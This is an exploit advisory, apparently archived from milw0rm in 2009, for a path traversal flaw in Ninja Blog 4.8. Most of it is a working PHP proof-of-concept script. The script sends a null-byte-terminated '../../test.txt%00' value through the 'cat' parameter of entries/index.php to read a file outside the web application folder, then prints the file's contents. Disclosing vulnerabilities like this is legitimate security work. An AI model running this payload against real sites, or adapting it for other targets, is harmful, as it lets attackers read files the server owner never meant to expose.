No description provided by source.
Vendor: http://ninjadesigns.co.uk Version(s): Ninja Blog 4.8 (May also affect earlier versions) Credit: Danny Moules Critical: Yes See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6 ---- Due to insufficient validation of client-side data, we can alter the path of files to be read to a file outside the intended directory. The following PoC will read a file named 'test.txt' one level above the application folder. --- <?php $strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read $strSite = "http://www.example.com/ninjablog4.8/"; //Don't forget the trailing slash $objCurl = curl_init(); curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead); curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true); echo("Getting data...\n"); $strDump = curl_exec($objCurl); curl_close($objCurl); echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n"); ?> # milw0rm.com [2009-01-19]